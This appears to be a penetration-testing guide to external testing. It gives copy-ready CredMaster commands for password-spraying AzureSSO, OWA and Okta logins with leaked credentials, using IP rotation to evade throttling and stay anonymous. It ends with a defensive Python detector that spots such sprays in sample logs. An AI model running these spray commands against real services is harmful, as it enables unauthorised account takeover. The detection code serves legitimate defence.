External
Once we have performed OSINT and additional enumeration, we can start more active testing such as:
Checking if FTP is open, and if anonymous login is enabled.
Checking if SSH is open, and if it accepts password authentication.
Checking all http/https pages for login pages, information disclosure, and default login credentials.
Password Spraying
We can password spray using the usernames and emails we obtained with OneDrive User Enum, plus the usernames, emails, and passwords from Dehashed-API-Tool. I typically spray with passwords found from Dehashed-API-Tool and WeakPasswords.net.
CredMaster (credmaster.py, used below) requires an Amazon AWS account to use the AWS API. It uses FireProx APIs to rotate IP addresses, stay anonymous, and beat throttling. It can spray against multiple environments, but the most common ones I run into are:
AzureSSO
python3 credmaster.py --config config.json --plugin azuresso --domain domain.com -u users.txt -p wordlist.txt --region us-east-1 --delay 20 --randomize --trim -o OUTFILE
OWA
python3 credmaster.py --config config.json --plugin owa --domain domain.com -u users.txt -p wordlist.txt --region us-east-1 --delay 20 --randomize --trim -o OUTFILE
Okta
python3 credmaster.py --config config.json --plugin okta --domain domain.com -u users.txt -p wordlist.txt --region us-east-1 --delay 20 --randomize --trim -o OUTFILE
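The commands above produce a distinctive pattern in the target's authentication logs: many distinct usernames, each failing only a handful of times (to stay under lockout), with the source IP changing constantly because of the FireProx rotation. The detector below is an added example (not from this page and not part of CredMaster or FireProx) showing how a defender can pick that pattern out of a log. The log line format, the thresholds and the sample lines are all constructed assumptions; the key point is that the grouping deliberately ignores the source IP, since per-IP thresholds are exactly what IP rotation defeats.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample authentication log (assumed format, not from the original page).
# One attempt per line: <ISO 8601 timestamp> <OK|FAIL> user=<name> src=<ip>
# 10:00-10:29 shows a low-and-slow spray from rotating IPs, with one successful hit (carol).
# 11:05 shows an ordinary user mistyping a password three times, then logging in.
SAMPLE_LOG = """\
2024-01-01T10:00:05Z FAIL user=alice src=203.0.113.10
2024-01-01T10:02:11Z FAIL user=bob src=203.0.113.11
2024-01-01T10:04:30Z FAIL user=carol src=203.0.113.12
2024-01-01T10:06:42Z FAIL user=dave src=203.0.113.10
2024-01-01T10:09:00Z FAIL user=erin src=203.0.113.11
2024-01-01T10:11:17Z FAIL user=frank src=203.0.113.12
2024-01-01T10:25:50Z FAIL user=alice src=203.0.113.13
2024-01-01T10:27:03Z OK user=carol src=203.0.113.10
2024-01-01T11:05:00Z FAIL user=bob src=198.51.100.7
2024-01-01T11:05:20Z FAIL user=bob src=198.51.100.7
2024-01-01T11:05:41Z FAIL user=bob src=198.51.100.7
2024-01-01T11:06:02Z OK user=bob src=198.51.100.7
"""

LINE_RE = re.compile(r"^(\S+)\s+(OK|FAIL)\s+user=(\S+)\s+src=(\S+)$")


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, result, user, src = m.groups()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"time": when, "ok": result == "OK", "user": user.lower(), "src": src}


def detect_spray(log_text, window_minutes=30, min_users=5, max_per_user=2):
    """Return one alert per tumbling window whose failures look like a password spray.

    Spray signature: at least min_users distinct accounts fail, but no single
    account fails more than max_per_user times (the attacker stays under lockout).
    Source IP is intentionally not part of the grouping key; it is only reported,
    so IP rotation does not hide the pattern. Accounts that failed and then
    succeeded in the same window are listed as hits for immediate triage.
    """
    window = window_minutes * 60
    buckets = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            buckets[int(ev["time"].timestamp()) // window].append(ev)

    alerts = []
    for bucket in sorted(buckets):
        events = buckets[bucket]
        failures_per_user = defaultdict(int)
        for ev in events:
            if not ev["ok"]:
                failures_per_user[ev["user"]] += 1
        if not failures_per_user:
            continue
        if len(failures_per_user) >= min_users and max(failures_per_user.values()) <= max_per_user:
            succeeded = {ev["user"] for ev in events if ev["ok"]}
            alerts.append({
                "window_start": datetime.fromtimestamp(bucket * window, tz=timezone.utc).isoformat(),
                "distinct_users": len(failures_per_user),
                "distinct_sources": len({ev["src"] for ev in events if not ev["ok"]}),
                "failures": sum(failures_per_user.values()),
                # accounts that failed and later succeeded in this window: likely compromised
                "hits": sorted(succeeded & set(failures_per_user)),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

On the sample data only the 10:00 window is flagged: six accounts failing from four different addresses with at most two failures each, and carol listed as a hit because she failed and then logged in within the window. The 11:05 window is not flagged even though it contains three failures from one address, because they all belong to a single account. Tune window_minutes and max_per_user to the lockout policy of the environment being monitored.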
More Coming Soon